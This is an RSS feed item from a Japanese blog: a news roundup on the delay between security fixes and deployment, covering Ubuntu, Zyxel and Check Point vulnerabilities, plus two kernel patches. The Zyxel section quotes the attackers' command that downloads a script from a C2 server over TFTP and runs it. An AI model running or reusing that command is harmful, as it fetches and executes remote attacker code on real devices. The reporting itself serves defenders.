<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Check Point on 思いつきそうで思いつかなくていたときに</title><link>https://blog.fuga.jp/tags/check-point/</link><description>Recent content in Check Point on 思いつきそうで思いつかなくていたときに</description><generator>Hugo -- gohugo.io</generator><language>ja-jp</language><copyright>Copyright(c) 2022-2025 SATO Daisuke. All rights reserved.</copyright><lastBuildDate>Thu, 24 Sep 2026 00:00:00 +0900</lastBuildDate><atom:link href="https://blog.fuga.jp/tags/check-point/index.xml" rel="self" type="application/rss+xml"/><item><title>その修正、あなたの手元にありますか？（2026/9/24 Linux・OSSトレンド）</title><link>https://blog.fuga.jp/posts/2026-09-24-linux-oss-trend/</link><pubDate>Thu, 24 Sep 2026 00:00:00 +0900</pubDate><guid>https://blog.fuga.jp/posts/2026-09-24-linux-oss-trend/</guid><description>&lt;h2 id="はじめに"&gt;&lt;a href="#%e3%81%af%e3%81%98%e3%82%81%e3%81%ab" class="header-anchor"&gt;&lt;/a&gt;はじめに
&lt;/h2&gt;&lt;p&gt;修正が書かれてから、自分の機械に届くまでの道のりは、思っているよりずっと長い。今日はその距離を測る5本です。&lt;/p&gt;
&lt;p&gt;上流でコミットがマージされても、ディストリビューションのパッケージに落ちてくるまでには時間がかかります。ベンダーがパッチを出しても、現場が適用するまでにはさらに時間がかかります。そして、セキュリティ製品自身の管理サーバーですら、その「届くまで」の空白を守り切れませんでした。&lt;/p&gt;
&lt;p&gt;今日は、上流修正がまだディストリに届いていないカーネルの穴から始めて、パッチはあったのに届かなかったスイッチ、上流に入るまでの長い道のりを歩んでいる2つの改善を挟み、最後にまた「修正はあったのに、届く前に悪用された」管理サーバーの話で締めます。&lt;/p&gt;
&lt;div class="video-wrapper"&gt;
 &lt;iframe loading="lazy" 
 src="https://www.youtube.com/embed/ruEmzT_weEA" 
 allowfullscreen 
 title="YouTube Video"
 &gt;
 &lt;/iframe&gt;
&lt;/div&gt;

&lt;h2 id="1-ubuntu-cve-2026-80521--コンテナ脱出の-poc-は出た修正はまだ届いていない"&gt;&lt;a href="#1-ubuntu-cve-2026-80521--%e3%82%b3%e3%83%b3%e3%83%86%e3%83%8a%e8%84%b1%e5%87%ba%e3%81%ae-poc-%e3%81%af%e5%87%ba%e3%81%9f%e4%bf%ae%e6%ad%a3%e3%81%af%e3%81%be%e3%81%a0%e5%b1%8a%e3%81%84%e3%81%a6%e3%81%84%e3%81%aa%e3%81%84" class="header-anchor"&gt;&lt;/a&gt;1. Ubuntu CVE-2026-80521 — コンテナ脱出の PoC は出た、修正はまだ届いていない
&lt;/h2&gt;&lt;p&gt;AF_UNIX ソケットのガベージコレクタに存在する use-after-free 脆弱性 &lt;a class="link" href="https://ubuntu.com/security/CVE-2026-80521" target="_blank" rel="noopener"
 &gt;CVE-2026-80521&lt;/a&gt;（CVSS 7.8、&lt;code&gt;AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H&lt;/code&gt;）を突いて、コンテナからホストへ抜け出すエクスプロイトコードが公開されました。&lt;/p&gt;
&lt;p&gt;経緯を追うと、届くまでの距離の長さがよくわかります。&lt;a class="link" href="https://depthfirst.com/research/containers-are-no-longer-safe" target="_blank" rel="noopener"
 &gt;研究グループ DepthFirst の報告&lt;/a&gt;によれば、同グループは2026年7月24日、Google がスポンサーするカーネル脆弱性コンテスト「kernelCTF」でこの脆弱性のエクスプロイトに成功。8月5日にカーネルセキュリティチームへ通知し、8月6日には上流（mainline 7.2 / stable 7.1.10）で修正がマージされました。CVE の報告者クレジットは、Arizona State University の Kyle Zeng 氏に帰属しています。ここまでは速い対応でした。ところが、上流の修正コミットがマージされてから、DepthFirst が9月22日に&lt;a class="link" href="https://thehackernews.com/2026/09/exploit-released-for-unpatched-ubuntu.html" target="_blank" rel="noopener"
 &gt;Ubuntu 26.04 向けの完全な PoC を公開する&lt;/a&gt;までの約7週間（47日）、Ubuntu 側にはこの修正が同梱されないままでした。&lt;/p&gt;
&lt;p&gt;「全 LTS が未修正」というわけではありません。&lt;a class="link" href="https://ubuntu.com/security/CVE-2026-80521" target="_blank" rel="noopener"
 &gt;Ubuntu の公式アドバイザリ&lt;/a&gt;を確認すると、26.04（resolute）と 24.04（noble）は標準パッケージ「linux」が脆弱なまま。22.04（jammy）は標準カーネルこそ影響なしですが、&lt;code&gt;linux-hwe-6.8&lt;/code&gt; や &lt;code&gt;linux-aws-6.8&lt;/code&gt; といった HWE 系カーネルパッケージは脆弱です。20.04 以前は影響を受けません。パッケージによって濃淡があり、それがかえって「自分の環境は大丈夫なのか」を確認しづらくしています。&lt;/p&gt;
&lt;p&gt;原因は、Ubuntu のアドバイザリが &amp;ldquo;GC could free a dead SCC partially&amp;rdquo; と要約する競合状態です。AF_UNIX ソケットは &lt;code&gt;SCM_RIGHTS&lt;/code&gt; でファイルディスクリプタを渡す際に循環参照を作ることがあり、これを解放するガベージコレクタの処理に隙がありました。厄介なのは、AF_UNIX が Docker や Kubernetes の既定 seccomp プロファイルで許可されている点です。DepthFirst は、コンテナが日常的に実行する通常のシステムコールだけでこの脆弱性に到達し、権限昇格を実証しています。&lt;/p&gt;
&lt;p&gt;DepthFirst が挙げる緩和策は、Kata Containers や Firecracker のような、ホストカーネルを共有しないカーネル分離技術の採用です。修正パッケージが配布されるまでは、&lt;code&gt;ubuntu.com/security/CVE-2026-80521&lt;/code&gt; のステータス変化を追いかけるほかありません。&lt;/p&gt;
&lt;h2 id="2-zyxel-gs1900-cve-2026-7273--パッチは6月にあったそれでも996台が食われた"&gt;&lt;a href="#2-zyxel-gs1900-cve-2026-7273--%e3%83%91%e3%83%83%e3%83%81%e3%81%af6%e6%9c%88%e3%81%ab%e3%81%82%e3%81%a3%e3%81%9f%e3%81%9d%e3%82%8c%e3%81%a7%e3%82%82996%e5%8f%b0%e3%81%8c%e9%a3%9f%e3%82%8f%e3%82%8c%e3%81%9f" class="header-anchor"&gt;&lt;/a&gt;2. Zyxel GS1900 CVE-2026-7273 — パッチは6月にあった、それでも996台が食われた
&lt;/h2&gt;&lt;p&gt;Zyxel の GS1900 シリーズスイッチ10モデルに存在するスタックベースのバッファオーバーフロー &lt;a class="link" href="https://nvd.nist.gov/vuln/detail/CVE-2026-7273" target="_blank" rel="noopener"
 &gt;CVE-2026-7273&lt;/a&gt;（CVSS 8.8、&lt;code&gt;AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H&lt;/code&gt;）は、LAN 内の未認証の攻撃者が細工した HTTP リクエストで OS コマンドを実行できる脆弱性です。&lt;a class="link" href="https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-stack-based-buffer-overflow-vulnerability-in-gs1900-series-switches-06-16-2026" target="_blank" rel="noopener"
 &gt;Zyxel は6月16日にパッチを公開&lt;/a&gt;していましたが、実際の悪用が始まったのは8月17日から。全10モデルの修正版はいずれも末尾 &lt;code&gt;.2&lt;/code&gt; のビルドとして提供されています。&lt;/p&gt;
&lt;p&gt;&lt;a class="link" href="https://www.greynoise.io/blog/open-season-on-kapibala-attacker-steals-government-records-wordpress-exploitation" target="_blank" rel="noopener"
 &gt;GreyNoise Intelligence の調査&lt;/a&gt;によれば、侵害されたスイッチは48カ国、合計996台。攻撃コードは PyArmor 6.7.5 で難読化された Python スクリプトで、&lt;code&gt;--libc&lt;/code&gt; や &lt;code&gt;--req-params&lt;/code&gt; といったコマンドライン引数で他モデルへの転用にも対応していました。侵入後は TFTP 経由で &lt;code&gt;sh -c tftp -gr c -l /1 &amp;lt;C2サーバー&amp;gt; 6969;/bin/sh /1&lt;/code&gt; というコマンドでコレクタースクリプトを取得・実行し、デバイス設定・ネットワークトポロジー・ハッシュ化された認証情報を窃取しています。&lt;/p&gt;
&lt;p&gt;GreyNoise は、この攻撃者が Acronis の追跡する「Red Heron」と、C2 ドメインやマルウェア、戦術の重複から同一または関連すると指摘しています。同じアクターとみられるグループは2026年前半にも WordPress の脆弱性チェーンを悪用し、29カ国49組織から18,566件のレコードを窃取していました。さらに GreyNoise は、コードの反復パターンやコメントから、エクスプロイトの生成に LLM が使われた可能性も指摘しています。&lt;/p&gt;
&lt;p&gt;そして最も重い事実が、996台のうち564台（約57%）が工場出荷時のデフォルト認証情報のまま運用されていたことです。CISA は9月21日に本脆弱性を KEV カタログへ追加し、連邦機関の修正期限は本日9月24日。根拠となる指令は &lt;a class="link" href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" target="_blank" rel="noopener"
 &gt;BOD 26-04&lt;/a&gt; です。パッチは3か月以上前から存在していました。届かなかったのは技術の問題ではなく、運用の問題だったように見えます。&lt;/p&gt;
&lt;h2 id="3-apple-silicon-mac-のスピーカーが-mainline-linux-で鳴る日へ--28パッチ"&gt;&lt;a href="#3-apple-silicon-mac-%e3%81%ae%e3%82%b9%e3%83%94%e3%83%bc%e3%82%ab%e3%83%bc%e3%81%8c-mainline-linux-%e3%81%a7%e9%b3%b4%e3%82%8b%e6%97%a5%e3%81%b8--28%e3%83%91%e3%83%83%e3%83%81" class="header-anchor"&gt;&lt;/a&gt;3. Apple Silicon Mac のスピーカーが mainline Linux で鳴る日へ — 28パッチ
&lt;/h2&gt;&lt;p&gt;セキュリティの谷を抜けて、少し明るい話です。&lt;a class="link" href="https://www.phoronix.com/news/Apple-Mac-Speaker-Headset-Linux" target="_blank" rel="noopener"
 &gt;James Calligeros 氏が9月20日、28パッチをカーネルメーリングリストへ投稿しました&lt;/a&gt;。Apple Silicon Mac のスピーカーとヘッドセットジャックを mainline Linux で鳴らすための変更で、新ドライバー「macaudio」と、ユーザー空間のスピーカー保護デーモン「speakersafetyd」を組み合わせた構成です。&lt;/p&gt;
&lt;p&gt;Texas Instruments 製アンプにはハードウェアレベルの保護機構がなく、Apple は macOS でユーザー空間プラグインとして保護を実装していました。&lt;a class="link" href="https://github.com/AsahiLinux/speakersafetyd" target="_blank" rel="noopener"
 &gt;speakersafetyd はこれを Linux で担う、開発者の知る限り初めての FOSS Smart Amp 実装&lt;/a&gt;です。Rust 製のユーザー空間デーモンで、PCM キャプチャから電圧・電流を読み取り、Thiele/Small パラメーターでボイスコイルの温度をモデル化して出力を絞ります。デーモンが動いていない場合はフェイルセーフとして、&lt;a class="link" href="https://www.phoronix.com/news/Apple-Mac-Speaker-Headset-Linux" target="_blank" rel="noopener"
 &gt;全スピーカーの kcontrol をミュート・ロックする&lt;/a&gt;設計です。無効化するカーネルパラメーター名が &lt;code&gt;snd_soc_macaudio.please_blow_up_my_speakers&lt;/code&gt;（直訳すると「私のスピーカーを吹き飛ばしてください」）というのも、警告としてよくできています。&lt;/p&gt;
&lt;p&gt;現時点ではまだレビュー中で、マージは完了していません。M3 系は今回のパッチには含まれず、必要なハードウェアノードの多くが未整備であることが理由です。パッケージとしては、Debian testing にはすでに &lt;code&gt;speakersafetyd&lt;/code&gt;（バージョン 2.0.1-3）が存在しています。上流に入るまでの道のりは、まだ半ばです。&lt;/p&gt;
&lt;h2 id="4-linux-74-の-do_open-最適化--vfs-の無駄がようやく削られる"&gt;&lt;a href="#4-linux-74-%e3%81%ae-do_open-%e6%9c%80%e9%81%a9%e5%8c%96--vfs-%e3%81%ae%e7%84%a1%e9%a7%84%e3%81%8c%e3%82%88%e3%81%86%e3%82%84%e3%81%8f%e5%89%8a%e3%82%89%e3%82%8c%e3%82%8b" class="header-anchor"&gt;&lt;/a&gt;4. Linux 7.4 の do_open() 最適化 — VFS の無駄が、ようやく削られる
&lt;/h2&gt;&lt;p&gt;もう1本、上流に向けて進んでいる途中の話です。Mateusz Guzik 氏によるパッチが、&lt;code&gt;do_open()&lt;/code&gt; 内で dentry の参照を2回取得して1回しか解放しない無駄な処理を取り除きました。新関数 &lt;code&gt;vfs_open_consume()&lt;/code&gt; を導入し、呼び出し元がすでに持っている dentry 参照をそのまま「消費」する形に変えることで、参照カウントの atomic 操作を1回分減らしています。変更は &lt;code&gt;fs/internal.h&lt;/code&gt; / &lt;code&gt;fs/namei.c&lt;/code&gt; / &lt;code&gt;fs/open.c&lt;/code&gt; の3ファイルにとどまります。&lt;/p&gt;
&lt;p&gt;&lt;a class="link" href="https://www.phoronix.com/news/Linux-7.4-Faster-Do-Open" target="_blank" rel="noopener"
 &gt;Phoronix の記事&lt;/a&gt;によれば、最終版（v5）の diffstat は「3 files changed, 39 insertions(+), 4 deletions(-)」。「約36行」という表現は、Phoronix の &amp;ldquo;three dozen lines&amp;rdquo; という概算表現に基づくものです。20コア VM 上の &lt;code&gt;will-it-scale&lt;/code&gt; による&lt;a class="link" href="https://ratatoskr.run/linux-fsdevel/2026/08/17357774/t" target="_blank" rel="noopener"
 &gt;read1 ベンチマーク&lt;/a&gt;では、1秒あたり4,043,375回のオープンが5,629,378回まで伸び、+39.2%の改善。この値は2026年に再計測されたもので、2024〜2025年のv2・v3時点の値（+35%）とは異なります。&lt;/p&gt;
&lt;p&gt;パッチは2024年8月にv2として初投稿されてから版を重ね、2026年8月3日にv4・v5が投稿されました。ただし、この記事の執筆時点で確認できた一次ソース上には、Al Viro 氏による Acked-by 等の正式な受理タグは見当たらず、&lt;code&gt;vfs.git&lt;/code&gt; の特定ブランチへのキュー入りも確認できませんでした。合成ベンチマークの数値がそのまま実アプリの体感に反映されるとは限らない点にも注意が必要です。地道な最適化が、まだレビューの列に並んでいる段階だと捉えておくのが正確でしょう。&lt;/p&gt;
&lt;h2 id="5-check-point-cve-2026-93616--ファイアウォールの司令塔が2か月間無防備だった"&gt;&lt;a href="#5-check-point-cve-2026-93616--%e3%83%95%e3%82%a1%e3%82%a4%e3%82%a2%e3%82%a6%e3%82%a9%e3%83%bc%e3%83%ab%e3%81%ae%e5%8f%b8%e4%bb%a4%e5%a1%94%e3%81%8c2%e3%81%8b%e6%9c%88%e9%96%93%e7%84%a1%e9%98%b2%e5%82%99%e3%81%a0%e3%81%a3%e3%81%9f" class="header-anchor"&gt;&lt;/a&gt;5. Check Point CVE-2026-93616 — ファイアウォールの司令塔が、2か月間無防備だった
&lt;/h2&gt;&lt;p&gt;最後は、また「修正はあったのに届かなかった」話です。Check Point Security Management Server の Web サービスに存在するパストラバーサル &lt;a class="link" href="https://nvd.nist.gov/vuln/detail/CVE-2026-93616" target="_blank" rel="noopener"
 &gt;CVE-2026-93616&lt;/a&gt;（CVSS 9.8、CWE-22、無認証）は、攻撃者が任意のファイルをアップロードし、任意のスクリプトを実行できる脆弱性です。7月23日から悪用が観測され始め、&lt;a class="link" href="https://blog.checkpoint.com/security/security-advisory-action-required-active-exploitation-of-cve-2026-85102-and-a-management-pre-authentication-vulnerability-cve-2026-93616" target="_blank" rel="noopener"
 &gt;Check Point が公式にパッチを公開したのは9月22日&lt;/a&gt;。悪用開始からパッチ公開まで、両端を含めて62日、動画タイトルの表現なら「2か月」です。&lt;/p&gt;
&lt;p&gt;Check Point の同じアドバイザリでは、もう1件の脆弱性 CVE-2026-85102（Check Point Security Gateway / Spark Firewall の VPN 証明書検証不備による RCE、CVSS 9.8）も並記されています。この脆弱性が影響を受けるのは Check Point 製品であり、他社製品ではありません。CISA は9月22日、両脆弱性を KEV カタログに追加し、&lt;a class="link" href="https://www.cisa.gov/news-events/alerts/2026/09/22/cisa-adds-four-known-exploited-vulnerabilities-catalog" target="_blank" rel="noopener"
 &gt;BOD 26-04&lt;/a&gt; に基づいて連邦機関に9月25日という短期の修正期限を課しました。CISA と FBI は2024年5月の共同アラートで、パストラバーサル脆弱性を2007年に MITRE が「unforgivable」と評したことに触れ、この種の欠陥がいまだ根絶されていない現状を指摘しています。&lt;/p&gt;
&lt;p&gt;対処として重要なのが、&lt;a class="link" href="https://blog.checkpoint.com/security/security-advisory-action-required-active-exploitation-of-cve-2026-85102-and-a-management-pre-authentication-vulnerability-cve-2026-93616" target="_blank" rel="noopener"
 &gt;LivePatch Take 28 / 29 ではこの脆弱性に対応しない&lt;/a&gt;という点です。公式ブログによれば、脆弱なのは R82.10 の Take 44 以下、R82 の Take 126 以下、R81.20 の Take 166 以下、R81.10 の Take 190 以下で、Jumbo Hotfix の手動適用が必須です。Check Point のサポート記事 SK1000171 を引く&lt;a class="link" href="https://windowsforum.com/news/cve-2026-85102-attacks-target-spark-vpns-93616-needs-hotfix.445704/" target="_blank" rel="noopener"
 &gt;複数の&lt;/a&gt;&lt;a class="link" href="https://dev.to/anoymask/check-point-cve-2026-93616-actively-exploited-pre-authentication-path-traversal-leading-to-script-3ac1" target="_blank" rel="noopener"
 &gt;報道&lt;/a&gt;によれば、修正版はそれぞれ Take 45 / 127 / 170 / 192 で、暫定的な回避策として TCP 19009 へのアクセス制限と、SmartConsole の「Trusted Clients」設定での接続元 IP 限定が案内されています。影響を受けるのは Security Management Server、Multi-Domain Security Management Server、Log Server、SmartEvent などです。Forkast は今回の事態を&lt;a class="link" href="https://forkast.news/the-control-tower-left-unguarded-check-points-management-server-zero-day-gave-attackers-two-months-of-silent-access/" target="_blank" rel="noopener"
 &gt;&amp;ldquo;The Control Tower Left Unguarded&amp;rdquo;（守られていなかった管制塔）&lt;/a&gt;と表現しています。ファイアウォール群を統括する司令塔自体が、2か月間、無防備だったということです。&lt;/p&gt;
&lt;h2 id="まとめ"&gt;&lt;a href="#%e3%81%be%e3%81%a8%e3%82%81" class="header-anchor"&gt;&lt;/a&gt;まとめ
&lt;/h2&gt;&lt;p&gt;5本を通して見えたのは、「修正が書かれた場所」と「自分の機械」の間にある距離でした。&lt;/p&gt;
&lt;p&gt;Ubuntu のカーネル修正は、上流にマージされてもパッケージにはまだ届いていません。Zyxel のパッチは6月から存在していたのに、3か月経っても564台には届かないままでした。Apple Silicon Mac のスピーカー対応も、do_open() の最適化も、上流にたどり着くまでの列にまだ並んでいます。そして Check Point の管理サーバーは、悪用が始まってから2か月、パッチという形でようやく修正が届きました。&lt;/p&gt;
&lt;p&gt;「パッチが出た」と「自分の環境に適用された」は、まったく別の状態です。その修正、あなたの手元にありますか？&lt;/p&gt;
&lt;h2 id="参考リンク"&gt;&lt;a href="#%e5%8f%82%e8%80%83%e3%83%aa%e3%83%b3%e3%82%af" class="header-anchor"&gt;&lt;/a&gt;参考リンク
&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="link" href="https://ubuntu.com/security/CVE-2026-80521" target="_blank" rel="noopener"
 &gt;Ubuntu Security Advisory — CVE-2026-80521&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://nvd.nist.gov/vuln/detail/CVE-2026-7273" target="_blank" rel="noopener"
 &gt;NVD — CVE-2026-7273&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-stack-based-buffer-overflow-vulnerability-in-gs1900-series-switches-06-16-2026" target="_blank" rel="noopener"
 &gt;Zyxel 公式セキュリティアドバイザリ（GS1900シリーズ）&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://www.greynoise.io/blog/open-season-on-kapibala-attacker-steals-government-records-wordpress-exploitation" target="_blank" rel="noopener"
 &gt;GreyNoise Intelligence — Kapibala キャンペーンの調査レポート&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://github.com/AsahiLinux/speakersafetyd" target="_blank" rel="noopener"
 &gt;speakersafetyd — Asahi Linux 公式リポジトリ&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://www.phoronix.com/news/Linux-7.4-Faster-Do-Open" target="_blank" rel="noopener"
 &gt;Phoronix — Linux 7.4 do_open() 最適化&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://blog.checkpoint.com/security/security-advisory-action-required-active-exploitation-of-cve-2026-85102-and-a-management-pre-authentication-vulnerability-cve-2026-93616" target="_blank" rel="noopener"
 &gt;Check Point 公式セキュリティアドバイザリ — CVE-2026-93616 / CVE-2026-85102&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="link" href="https://nvd.nist.gov/vuln/detail/CVE-2026-93616" target="_blank" rel="noopener"
 &gt;NVD — CVE-2026-93616&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item></channel></rss>